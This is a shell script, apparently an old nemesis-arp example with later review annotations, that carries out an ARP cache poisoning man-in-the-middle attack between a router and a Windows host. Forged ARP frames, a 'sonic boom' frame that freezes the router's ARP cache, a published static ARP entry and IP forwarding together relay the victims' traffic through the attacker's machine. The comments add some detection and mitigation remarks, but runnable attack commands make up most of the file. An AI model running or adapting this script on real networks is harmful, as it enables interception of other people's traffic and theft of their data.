# Copyright (C) 2001 Kevin DePeugh and Jeff Nathan
#
# automatically perform the "sonic boom" on a network
#
# Purpose: a nemesis-arp example that poisons the ARP caches of a router and a
# Windows host on one Ethernet segment (fxp0) so that traffic between them
# passes through this host, which then forwards it.  Every address below is
# hard-coded; the script does nothing useful on any other network.
#
# Runtime requirements visible in the commands below: root, ipf(8) with the
# rule files ./pass.rules and ./block.rules in the current directory (neither
# file is on this page), nemesis-arp in $PATH, and an arp(8) that accepts the
# "permanent" and "pub" keywords (looks like OpenBSD syntax -- confirm on the
# host OS).  No exit status is checked, so a failed step is silently skipped.
#
# This script assumes that the router's addresses are:
# IP 10.100.100.1
# MAC 0:30:19:3e:a5:0
#
# This script assumes that the Windows system's addresses are:
# IP 10.100.100.69
# MAC 00:00:86:5a:d0:1c
#
# This script assumes that the attacker's addresses are:
# IP 10.100.100.99
# MAC 00:10:a4:8f:50:6a

# set firewall to allow all incoming and outgoing traffic
# (-Fa flushes the active ipf rule set; -f loads pass.rules relative to the
# current directory, so the script must be run from the directory holding it)
#
/sbin/ipf -Fa -f ./pass.rules
sleep 1

# create/overwrite ARP cache entry for windows system on the router
# The frame is addressed to the router's MAC (-M) and claims to come from the
# Windows IP (-S); no -h is given, so the ARP sender hardware address
# presumably defaults to this interface's MAC -- confirm with nemesis-arp.
# On the wire this is an unsolicited ARP whose IP/MAC binding contradicts the
# one already learned: exactly the event arpwatch-style monitors and switch
# Dynamic ARP Inspection exist to flag.
#
nemesis-arp -S 10.100.100.69 -D 10.100.100.1 -d fxp0 -M "0:30:19:3e:a5:0"

# overwrite ARP cache entry for router on the windows system
# Same idea in the other direction: Ethernet source (-H) is the attacker's
# MAC and the frame is addressed to the Windows host (-M), so the Windows
# host now maps the router's IP to the attacker's MAC.
#
nemesis-arp -S 10.100.100.1 -D 10.100.100.69 -d fxp0 \
    -H "00:10:a4:8f:50:6a" -M "00:00:86:5a:d0:1c"

# overwrite the router's own ARP entry via the sonic boom
# from this point forward, the router will no longer respond to ARP requests
# nor will it update its ARP cache. However, ARP cache information will
# still time out based upon the router's configuration
# (Sent from the router's own IP and MAC to itself, with the attacker's MAC
# as the ARP sender address (-h).  What -T selects is not on this page --
# check nemesis-arp's usage text.  Per the note above the effect is bounded
# by the router's ARP timeout, after which it re-learns normally; static ARP
# entries for critical hosts, or DAI on the switch, remove the window.)
#
nemesis-arp -T -S 10.100.100.1 -D 10.100.100.1 -d fxp0 \
    -H "0:30:19:3e:a5:0" -M "0:30:19:3e:a5:0" -h "00:10:a4:8f:50:6a"
sleep 1

# delete existing ARP cache entries on the attacker's system
# NOTE(review): 10.100.100.1 is deleted twice; the second call is either a
# no-op or an unchecked error on a now-missing entry -- looks like a leftover.
#
/usr/sbin/arp -d 10.100.100.1
/usr/sbin/arp -d 10.100.100.1
/usr/sbin/arp -d 10.100.100.69

# add static ARP cache entry with correct hardware address of router's IP so
# that attack system can still deliver IP datagrams to the router via Ethernet
#
/usr/sbin/arp -s 10.100.100.1 0:30:19:3e:a5:0 permanent

# add static ARP cache entry with attacker's hardware address and router's IP
# and publish it so that ARP requests for the router's hardware address will
# be answered by the attacker's system with the attacker's hardware address
# (From a monitoring point of view this is a second MAC answering ARP for
# the gateway IP -- the same signature as the injected frames above, and
# something a gateway-MAC watch on the segment would catch even if the
# initial injection was missed.)
#
/usr/sbin/arp -s 10.100.100.1 00:10:a4:8f:50:6a permanent pub
sleep 1

# configure firewall on attack system to block all outbound IP/TCP/UDP thus
# preventing duplicate responses
# (i.e. keep this host's own stack from answering traffic that is only meant
# to be relayed; the contents of block.rules are not on this page)
#
/sbin/ipf -Fa -f ./block.rules
sleep 1

# turn on IP forwarding
# Relays the intercepted traffic between the two poisoned hosts.  On a
# workstation, net.inet.ip.forwarding=1 appearing unexpectedly is itself a
# host-level indicator worth alerting on.
/sbin/sysctl -w net.inet.ip.forwarding=1